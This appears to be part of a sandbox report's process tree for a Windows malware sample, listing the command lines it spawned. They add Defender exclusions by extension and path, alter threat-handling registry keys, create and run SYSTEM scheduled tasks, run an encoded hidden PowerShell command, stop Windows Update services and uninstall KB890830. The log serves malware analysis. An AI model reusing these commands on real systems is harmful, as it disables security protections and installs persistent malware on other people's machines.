C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
8⤵
- Command and Scripting Interpreter: PowerShell
PID:2056

C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
9⤵
PID:688

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
5⤵
PID:1392

C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
6⤵
PID:2892

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
7⤵
- Command and Scripting Interpreter: PowerShell
PID:2496

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
8⤵
PID:2280

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 01:24:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\tLVYvupllyMnDiy\dQfdvyL.exe\" it /QPIdidWIue 385118 /S" /V1 /F
5⤵
- Creates scheduled task(s)
PID:1588

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"
5⤵
PID:2984

C:\Windows\SysWOW64\cmd.exe
/C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
6⤵
PID:2988

\??\c:\windows\SysWOW64\schtasks.exe
schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
7⤵
PID:2928

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2456 -s 844
2⤵
PID:2712

C:\ProgramData\Google\Chrome\updater.exe
C:\ProgramData\Google\Chrome\updater.exe
1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1756

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1936

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
2⤵
- Suspicious use of WriteProcessMemory
PID:2816

C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
3⤵
- Drops file in Windows directory
PID:2328

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
2⤵
- Launches sc.exe
PID:2944

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
2⤵
- Launches sc.exe
PID:2416

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
2⤵
- Launches sc.exe
PID:1544

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
2⤵
- Launches sc.exe
PID:756

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
2⤵
- Launches sc.exe
PID:1968

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:672

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:536

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:484

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2376

C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
2⤵
PID:920

C:\Windows\explorer.exe
explorer.exe
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2476

C:\Windows\system32\taskeng.exe
taskeng.exe {F8077C70-624F-4D1A-9DDC-02EDD96EB082} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:1560

C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\tLVYvupllyMnDiy\dQfdvyL.exe
C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\tLVYvupllyMnDiy\dQfdvyL.exe it /QPIdidWIue 385118 /S
2⤵
PID:1860

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
3⤵
PID:2976

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
4⤵
PID:2228

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
5⤵
PID:2548

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
6⤵
PID:1328

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
4⤵
PID:812

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
5⤵
PID:2948

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
6⤵
PID:2580

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
4⤵
PID:2252

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
5⤵
PID:1572

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
6⤵
PID:1664

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
4⤵
PID:2516

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
5⤵
PID:1316

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
6⤵
PID:1632

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
4⤵
PID:2804

C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
5⤵
PID:2012

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
6⤵
- Command and Scripting Interpreter: PowerShell
PID:2008

C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
7⤵
PID:2400

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gppdSiyvM" /SC once /ST 00:41:38 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
3⤵
- Creates scheduled task(s)
PID:332

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gppdSiyvM"
3⤵
PID:1636

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gppdSiyvM"
3⤵
PID:2408

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"
3⤵
PID:2468

C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
4⤵
PID:2280

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
5⤵
- Command and Scripting Interpreter: PowerShell
PID:1528

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
6⤵
PID:2496

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WPGfhLqOzAIwKSwi" /t REG_DWORD /d 0 /reg:32
3⤵
PID:2420

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WPGfhLqOzAIwKSwi" /t REG_DWORD /d 0 /reg:32
4⤵
PID:2132

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WPGfhLqOzAIwKSwi" /t REG_DWORD /d 0 /reg:64
3⤵
PID:2812

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WPGfhLqOzAIwKSwi" /t REG_DWORD /d 0 /reg:64
4⤵
PID:2364

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WPGfhLqOzAIwKSwi" /t REG_DWORD /d 0 /reg:32
3⤵
PID:3052

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WPGfhLqOzAIwKSwi" /t REG_DWORD /d 0 /reg:32
4⤵
PID:2000

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WPGfhLqOzAIwKSwi" /t REG_DWORD /d 0 /reg:64
3⤵
PID:2292

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WPGfhLqOzAIwKSwi" /t REG_DWORD /d 0 /reg:64
4⤵
PID:2676

C:\Windows\SysWOW64\cmd.exe
cmd /C copy nul "C:\Windows\Temp\WPGfhLqOzAIwKSwi\SGHzTzIe\wGCGFdJYIdUaXxTH.wsf"
3⤵
PID:2160

C:\Windows\SysWOW64\wscript.exe
wscript "C:\Windows\Temp\WPGfhLqOzAIwKSwi\SGHzTzIe\wGCGFdJYIdUaXxTH.wsf"
3⤵
PID:1288

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:32
4⤵
PID:584

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:64
4⤵
PID:904

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR" /t REG_DWORD /d 0 /reg:32
4⤵
PID:2044

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR" /t REG_DWORD /d 0 /reg:64
4⤵
PID:2104

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DQANlvmTAvZU2" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1764

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DQANlvmTAvZU2" /t REG_DWORD /d 0 /reg:64
4⤵
PID:2228

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PZjcxajBIsNTC" /t REG_DWORD /d 0 /reg:32
4⤵
PID:3032

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PZjcxajBIsNTC" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1604

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mWJfrhglotUn" /t REG_DWORD /d 0 /reg:32
4⤵
PID:2800

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mWJfrhglotUn" /t REG_DWORD /d 0 /reg:64
4⤵
PID:2116

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\VyWMmqtuSNndeGVB" /t REG_DWORD /d 0 /reg:32
4⤵
PID:2012

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\VyWMmqtuSNndeGVB" /t REG_DWORD /d 0 /reg:64
4⤵
PID:2412

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
4⤵
PID:2648

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
4⤵
PID:484

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA" /t REG_DWORD /d 0 /reg:32
4⤵
PID:2968

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1624

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WPGfhLqOzAIwKSwi" /t REG_DWORD /d 0 /reg:32
4⤵
PID:2608

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WPGfhLqOzAIwKSwi" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1672

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1740

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:64
4⤵
PID:576

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1800

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1260

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DQANlvmTAvZU2" /t REG_DWORD /d 0 /reg:32
4⤵
PID:936

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DQANlvmTAvZU2" /t REG_DWORD /d 0 /reg:64
4⤵
PID:2408

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PZjcxajBIsNTC" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1872

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PZjcxajBIsNTC" /t REG_DWORD /d 0 /reg:64
4⤵
PID:3020

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mWJfrhglotUn" /t REG_DWORD /d 0 /reg:32
4⤵
PID:2168

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mWJfrhglotUn" /t REG_DWORD /d 0 /reg:64
4⤵
PID:2192

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\VyWMmqtuSNndeGVB" /t REG_DWORD /d 0 /reg:32
4⤵
PID:2920

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\VyWMmqtuSNndeGVB" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1124

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1588

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
4⤵
PID:572

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1072

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA" /t REG_DWORD /d 0 /reg:64
4⤵
PID:2664

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WPGfhLqOzAIwKSwi" /t REG_DWORD /d 0 /reg:32
4⤵
PID:2728

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WPGfhLqOzAIwKSwi" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1572

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "XyyyteIMwZeutaZuw" /SC once /ST 00:48:55 /RU "SYSTEM" /TR "\"C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\dGobqhk.exe\" GH /uqJedidYy 385118 /S" /V1 /F
3⤵
- Creates scheduled task(s)
PID:2324

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "XyyyteIMwZeutaZuw"
3⤵
PID:584

C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\dGobqhk.exe
C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\dGobqhk.exe GH /uqJedidYy 385118 /S
2⤵
PID:2680

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
3⤵
PID:1644

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
4⤵
PID:2212

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
5⤵
PID:2992

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
6⤵
PID:344

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
4⤵
PID:2908

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
5⤵
PID:2012

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
6⤵
PID:2976

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
4⤵
PID:2832

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
5⤵
PID:2588

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
6⤵
PID:632

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
4⤵
PID:2592

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
5⤵
PID:2244

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
6⤵
PID:2612

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
4⤵
PID:1448

C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
5⤵
PID:1612

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
6⤵
- Command and Scripting Interpreter: PowerShell
PID:332

C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
7⤵
PID:648

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "bbmnnUCIPYyTQrzMQJ"
3⤵
PID:2268

C:\Windows\SysWOW64\cmd.exe
